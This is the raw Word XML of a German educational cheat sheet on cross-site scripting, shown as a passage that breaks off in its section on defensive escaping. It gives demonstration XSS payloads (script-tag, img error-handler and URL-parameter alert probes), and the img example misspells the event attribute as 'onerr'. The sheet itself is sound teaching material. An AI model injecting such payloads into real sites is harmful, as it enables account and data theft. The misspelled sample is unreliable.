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DAC7D" w14:textId="77777777" w:rsidR="003F2042" w:rsidRPr="00881BA1" w:rsidRDefault="009E18DB" w:rsidP="009E18DB">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00881BA1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Merkb</w:t>
      </w:r>
      <w:r w:rsidR="003845D6" w:rsidRPr="00881BA1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00881BA1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00881BA1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cross-Site-Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE1D01" w14:textId="00DC0D3A" w:rsidR="009E18DB" w:rsidRPr="003C6D51" w:rsidRDefault="009E18DB" w:rsidP="003C6D51">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc25335915"/>
      <w:r w:rsidRPr="003C6D51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Was ist Cross-Site-Scripting / XSS?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0E941008" w14:textId="671324BA" w:rsidR="00210CA1" w:rsidRPr="002B4BAE" w:rsidRDefault="00366359" w:rsidP="009C4D76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Beim XSS </w:t>
      </w:r>
      <w:r w:rsidR="00446B5F">
        <w:rPr>
          <w:rStyle w:val="Funotenzeichen"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
      <w:r w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">wird eine Sicherheitslücke in einer Webanwendung ausgenutzt, um </w:t>
      </w:r>
      <w:r w:rsidR="00380F20" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0023160C" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r w:rsidR="00380F20" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>adc</w:t>
      </w:r>
      <w:r w:rsidR="0023160C" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ode auszuführen</w:t>
      </w:r>
      <w:r w:rsidR="007F4318" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00380F20" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Besonders beliebt</w:t>
      </w:r>
      <w:r w:rsidR="00FA38A0" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> sind dafür Script</w:t>
      </w:r>
      <w:r w:rsidR="005204B9" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>-S</w:t>
      </w:r>
      <w:r w:rsidR="00FA38A0" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>prachen, wie z.B. JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="005A54BA" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Das </w:t>
      </w:r>
      <w:r w:rsidR="009C4D76" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="005A54BA" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>iel dabei ist</w:t>
      </w:r>
      <w:r w:rsidR="009C4D76" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> es</w:t>
      </w:r>
      <w:r w:rsidR="00BF675E" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A0663F" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>z.B. an die persönlichen Daten eines Benutzers zu kommen, um dessen Identität zu stehlen</w:t>
      </w:r>
      <w:r w:rsidR="00D151C3" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> oder sein Benutzerkonto zu übernehmen</w:t>
      </w:r>
      <w:r w:rsidR="00A0663F" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CE3200">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Da viele Personen d</w:t>
      </w:r>
      <w:r w:rsidR="00520B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidR="00CE3200">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>selbe</w:t>
      </w:r>
      <w:r w:rsidR="00520B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kombination von Benutzername und</w:t>
      </w:r>
      <w:r w:rsidR="00CE3200">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Passwort für verschiedenen Dienste benutzen</w:t>
      </w:r>
      <w:r w:rsidR="001D1D17">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00520B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> kann man so mit den Informationen</w:t>
      </w:r>
      <w:r w:rsidR="00910A69">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, welche man von schlecht geschützten Diensten erbeutet hat</w:t>
      </w:r>
      <w:r w:rsidR="001D1D17">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006A62DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> die Konten </w:t>
      </w:r>
      <w:r w:rsidR="001D1D17">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>anderer Dienste übernehmen, welche die</w:t>
      </w:r>
      <w:r w:rsidR="006A62DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Opfer </w:t>
      </w:r>
      <w:r w:rsidR="001D1D17">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>verwenden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DB6697" w14:textId="6137B52E" w:rsidR="009E18DB" w:rsidRPr="002B4BAE" w:rsidRDefault="009E18DB" w:rsidP="009E18DB">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc25335916"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>Wie wird es angewandt?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="666A0C5D" w14:textId="1BE174C2" w:rsidR="00345F1C" w:rsidRPr="002B4BAE" w:rsidRDefault="00A07E95" w:rsidP="00471BF9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Beim XSS versucht man</w:t>
      </w:r>
      <w:r w:rsidR="00137353" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> eine Webseite oder App dazu zu bringen Code auszuführen, den man einschleust. Dazu können z.</w:t>
      </w:r>
      <w:r w:rsidR="0098191B" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">B. </w:t>
      </w:r>
      <w:r w:rsidR="00137353" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Formularfelder oder die URL verwendet werden.</w:t>
      </w:r>
      <w:r w:rsidR="00D56693" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mit normalen Benutzereingaben</w:t>
      </w:r>
      <w:r w:rsidR="00304BB5" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> sollte man dabei keinen Schaden anrichten können. Stattdessen muss man seine Eingaben manipulieren, dass diese im Code</w:t>
      </w:r>
      <w:r w:rsidR="006912C7" w:rsidRPr="002B4BAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> ausgeführt werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE25667" w14:textId="7B1B12AF" w:rsidR="008D73EE" w:rsidRDefault="008D73EE" w:rsidP="007165B5">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc25335917"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>Reflektiert / nicht persi</w:t>
      </w:r>
      <w:r w:rsidR="004D24DF">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>tent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="60432F1E" w14:textId="5BA5D265" w:rsidR="004B4744" w:rsidRPr="002B4BAE" w:rsidRDefault="000453DA" w:rsidP="004B4744">
      <w:r>
        <w:t xml:space="preserve">Dynamische Seiten passen ihren Inhalt oft an Werte an, welche </w:t>
      </w:r>
      <w:r w:rsidR="00D3485C">
        <w:t xml:space="preserve">sie </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">über ein Formular oder die </w:t>
      </w:r>
      <w:r w:rsidR="00D3485C">
        <w:t xml:space="preserve">URL haben. </w:t>
      </w:r>
      <w:r w:rsidR="00BF5B18">
        <w:t>Wenn diese Werte direkt vom Server an den Browser zurückgesendet werden</w:t>
      </w:r>
      <w:r w:rsidR="004F097C">
        <w:t>, ohne dass sie in der Datenbank gespeichert werden,</w:t>
      </w:r>
      <w:r w:rsidR="00AB22B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA676F">
        <w:t xml:space="preserve">ist der so ausgeführte </w:t>
      </w:r>
      <w:r w:rsidR="008A69BD">
        <w:t>Schadc</w:t>
      </w:r>
      <w:r w:rsidR="00EA676F">
        <w:t xml:space="preserve">ode nicht persistent. Das bedeutet </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EA676F">
        <w:t>z.B.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EA676F">
        <w:t xml:space="preserve"> dass der Schadcode nur ausgeführt wird, wenn man eine ganz bestimmte URL aufruft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4450DBAD" w14:textId="43E90F81" w:rsidR="004B4744" w:rsidRPr="002B4BAE" w:rsidRDefault="004B4744" w:rsidP="003258DD">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc25335918"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>Beispiel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00D66E01">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>1);&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F7F9A4" w14:textId="4FADF0B6" w:rsidR="008D73EE" w:rsidRDefault="008D73EE" w:rsidP="007165B5">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc25335919"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>Beständig / persistent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2E7A3C66" w14:textId="1624EF0F" w:rsidR="00797362" w:rsidRPr="002B4BAE" w:rsidRDefault="008A69BD" w:rsidP="00797362">
      <w:r>
        <w:t>Wenn man es schafft die App dazu zu bringen den Schadcode in der Datenbank zu speichern</w:t>
      </w:r>
      <w:r w:rsidR="009B2F29">
        <w:t xml:space="preserve"> wird dieser jedes Mal ausgeführt, wenn der betroffene Inhalt geladen wird</w:t>
      </w:r>
      <w:r w:rsidR="005649EA">
        <w:t>. Solche persistenten Angriffe sind z.B. bei Foren möglich, wo Benutzereingaben als Beitrag in der Datenbank abgelegt und später für andere Besucher</w:t>
      </w:r>
      <w:r w:rsidR="00AF61D2">
        <w:t xml:space="preserve"> wieder ausgegeben werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A5FFBC" w14:textId="1EDE58B5" w:rsidR="008D73EE" w:rsidRPr="002B4BAE" w:rsidRDefault="00797362" w:rsidP="003258DD">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc25335920"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>Beispiel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="00D66E01">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="002B4BAE">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00545C0D" w:rsidRPr="002B4BAE">
        <w:t>fake.png</w:t>
      </w:r>
      <w:r w:rsidR="002B4BAE">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00270398" w:rsidRPr="002B4BAE">
        <w:t xml:space="preserve"> onerr=</w:t>
      </w:r>
      <w:r w:rsidR="002B4BAE">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00270398" w:rsidRPr="002B4BAE">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00270398" w:rsidRPr="002B4BAE">
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="002B4BAE">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="002C6B66" w:rsidRPr="002B4BAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B63FF4">
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B3910D" w14:textId="7F4B7885" w:rsidR="008D73EE" w:rsidRPr="002B4BAE" w:rsidRDefault="008D73EE" w:rsidP="007165B5">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc25335921"/>
      <w:r w:rsidRPr="002B4BAE">
        <w:t>DOM-basier</w:t>
      </w:r>
      <w:r w:rsidR="00AE12ED" w:rsidRPr="002B4BAE">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4BAE">
        <w:t xml:space="preserve"> / lokal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="775EA1EE" w14:textId="67869724" w:rsidR="008D73EE" w:rsidRDefault="00D17ACA" w:rsidP="008D73EE">
      <w:r>
        <w:t xml:space="preserve">Bei einem lokalen Angriff ist der Webserver nicht beteiligt. Stattdessen </w:t>
      </w:r>
      <w:r w:rsidR="000A62E6">
        <w:t>bringt man das Opfer dazu</w:t>
      </w:r>
      <w:r w:rsidR="005B4765">
        <w:t xml:space="preserve"> ein</w:t>
      </w:r>
      <w:r w:rsidR="003622CC">
        <w:t>e kompromittierte</w:t>
      </w:r>
      <w:r w:rsidR="005B4765">
        <w:t xml:space="preserve"> URL aufzurufen</w:t>
      </w:r>
      <w:r w:rsidR="003622CC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003002B0">
        <w:t>welche ein Script als Parameter enthält. Der Browser führt dieses Script dann aus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF65E0" w14:textId="12DA542E" w:rsidR="006E0D14" w:rsidRDefault="007165B5" w:rsidP="003258DD">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc25335922"/>
      <w:r>
        <w:t>Beispiel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="003258DD">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A73191" w:rsidRPr="007509B9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://www.b</w:t>
      </w:r>
      <w:r w:rsidR="00B63FF4" w:rsidRPr="007509B9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>ad</w:t>
      </w:r>
      <w:r w:rsidR="00A73191" w:rsidRPr="007509B9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>url.com/index.html/?</w:t>
      </w:r>
      <w:r w:rsidR="00B63FF4" w:rsidRPr="007509B9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:r w:rsidR="00A73191" w:rsidRPr="007509B9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>=&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A73191" w:rsidRPr="007509B9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A73191" w:rsidRPr="007509B9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/script</w:t>
      </w:r>
      <w:r w:rsidR="00A73191" w:rsidRPr="007509B9">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E57B40" w14:textId="6AD68529" w:rsidR="00A73191" w:rsidRDefault="00FD5BCD" w:rsidP="00332E44">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc25335923"/>
      <w:r>
        <w:t xml:space="preserve">Allgemeine </w:t>
      </w:r>
      <w:r w:rsidR="00902CAC">
        <w:t>Schutzmassnahmen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="159CB2CA" w14:textId="7240C092" w:rsidR="00332E44" w:rsidRDefault="00344BC4" w:rsidP="00332E44">
      <w:r>
        <w:t xml:space="preserve">Man sollte in jedem Fall davon ausgehen, dass Benutzereingaben "böse" sind. Somit ist es notwendig alle Eingaben zu prüfen und diese </w:t>
      </w:r>
      <w:r w:rsidR="00627BCC">
        <w:t xml:space="preserve">mit Maskierungszeichen </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A754F8">
        <w:t>escapen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002558D2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00645BEF">
        <w:t xml:space="preserve"> Diese </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00645BEF" w:rsidRPr="000215F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Maskierungszeichen</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00645BEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00771377">
        <w:t>(z.B. \)</w:t>
      </w:r>
      <w:r w:rsidR="00645BEF">
        <w:t>werden verwendet, um</w:t>
      </w:r>
      <w:r w:rsidR="00A704C2">
        <w:t xml:space="preserve"> zu verhindern, dass das nachfolgende </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00A704C2" w:rsidRPr="000215F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Funktioniszeichen</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="00A704C2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00771377">
        <w:t xml:space="preserve">(z.B. </w:t>
      </w:r>
      <w:r w:rsidR="00C215FA">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00771377">
        <w:t xml:space="preserve"> oder ") </w:t>
      </w:r>
      <w:r w:rsidR="00A704C2">
        <w:t xml:space="preserve">vom Code als solches </w:t>
      </w:r>
      <w:r w:rsidR="00A704C2">
        <w:lastRenderedPageBreak/>
        <w:t>betrachtet wird.</w:t>
      </w:r>
      <w:r w:rsidR="00771377">
        <w:t xml:space="preserve"> Ein bekanntes Beispiel sind Anführungszeichen ("), welche mit einem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00771377">
        <w:t>Backslash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00771377">
        <w:t xml:space="preserve"> (\) maskiert werden</w:t>
      </w:r>
      <w:r w:rsidR="00D80840">
        <w:t>, wenn sie in einem PHP echo tatsächliche ausgegeben werden sollen und nicht den Text umschliessen, der ausgegeben werden soll.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20245D17" w14:textId="6A38E5BE" w:rsidR="00D80840" w:rsidRDefault="00F97F93" w:rsidP="0065412B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0065412B">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>hp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; echo "Das hier ist ein </w:t>
      </w:r>
      <w:r w:rsidR="0065412B">
        <w:t>Anführungszeichen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0065412B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>"." &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FE1DDC" w14:textId="39B2C9CE" w:rsidR="00061A68" w:rsidRDefault="00061A68" w:rsidP="00F217CE">
      <w:r>
        <w:t xml:space="preserve">Mit dem </w:t>
      </w:r>
      <w:r w:rsidR="00E60AA8">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>roten</w:t>
      </w:r>
      <w:r w:rsidR="00E60AA8">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Backslash</w:t>
      </w:r>
